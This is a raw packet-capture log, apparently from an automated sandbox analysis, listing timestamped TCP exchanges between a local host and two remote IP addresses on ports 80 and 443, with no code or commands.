                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.293960094 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.294013977 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.294454098 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.294504881 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.294560909 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.294610977 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.295661926 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.295751095 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.295770884 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.295792103 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.296811104 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.296864033 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.296988964 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.297039986 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.297738075 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.297791958 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.297838926 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.297888041 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.298811913 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.298865080 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.298995972 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.299045086 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.299946070 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.299978018 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.299998045 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.300015926 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.301145077 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.301198959 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.301222086 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.301271915 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.302090883 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.302144051 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.302215099 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.302263975 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.303275108 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.303330898 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.303333998 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.303381920 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.304265976 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.304312944 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.304367065 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.304411888 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.305352926 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.305413008 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.305478096 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.305542946 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.306507111 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.306598902 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.306651115 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.306700945 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.307540894 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.307595015 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.307647943 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.307698011 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.308657885 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.308715105 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.308767080 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.308815956 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.309751034 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.309803009 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.309871912 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.309923887 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.310832024 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.310885906 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.310931921 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.310978889 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.311897993 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.311950922 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.312005997 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.312053919 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.313034058 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.313085079 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.313134909 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.313183069 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.314142942 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.314201117 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.314342976 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.314393044 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.371264935 CET4434978013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.371360064 CET4434978013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.371424913 CET49780443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.371539116 CET49780443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.371556044 CET4434978013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.371568918 CET49780443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.371576071 CET4434978013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.374114990 CET49785443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.374159098 CET4434978513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.374243021 CET49785443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.374381065 CET49785443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.374397993 CET4434978513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.476650953 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.476682901 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.476699114 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.476749897 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.476785898 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.476813078 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.476866961 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.477335930 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.477394104 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.477449894 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.477497101 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.479084969 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.479134083 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.479178905 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.479227066 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.479803085 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.479849100 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.479895115 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.479942083 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.480652094 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.480699062 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.480829954 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.480879068 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.481426001 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.481473923 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.481517076 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.481563091 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.482618093 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.482664108 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.482784033 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.482831955 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.483742952 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.483793020 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.483841896 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.483889103 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.484761953 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.484812021 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.484869957 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.484915972 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.485801935 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.485850096 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.485917091 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.485963106 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.486885071 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.486932993 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.487027884 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.487072945 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.487989902 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.488037109 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.488081932 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.488126993 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.489085913 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.489135027 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.489181995 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.489229918 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.490176916 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.490226984 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.490269899 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.490315914 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.491264105 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.491317987 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.491338968 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.491430044 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.492352962 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.492408037 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.492454052 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.492501974 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.493443012 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.493493080 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.493539095 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.493587971 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.494541883 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.494590998 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.494679928 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.494725943 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.495733976 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.495784044 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.495860100 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.495907068 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.496836901 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.496886969 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.496984005 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.497033119 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.497864962 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.497916937 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.497976065 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.498023033 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.499162912 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.499212980 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.499404907 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.499485970 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.499983072 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.500029087 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.500070095 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.500116110 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.501071930 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.501121044 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.501126051 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.501171112 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.502289057 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.502337933 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.502427101 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.502474070 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.503232956 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.503278971 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.503330946 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.503377914 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.504318953 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.504384995 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.504472971 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.504520893 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.505455017 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.505503893 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.505542994 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.505589962 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.506510019 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.506556988 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.506596088 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.506642103 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.507581949 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.507628918 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.507653952 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.507699966 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.508682013 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.508754015 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.508805037 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.508851051 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.509747028 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.509794950 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.509860992 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.509907961 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.510847092 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.510896921 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.510941982 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.510989904 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.511949062 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.511998892 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.512044907 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.512090921 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.513127089 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.513175011 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.513178110 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.513222933 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.514199972 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.514250994 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.514635086 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.514681101 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.515222073 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.515268087 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.515306950 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.515353918 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.516290903 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.516341925 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.516479015 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.516527891 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.517370939 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.517417908 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.517425060 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.517469883 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.518462896 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.518511057 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.518558979 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.518604040 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.519579887 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.519651890 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.519681931 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.519727945 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.520690918 CET804977031.41.244.11192.168.2.4
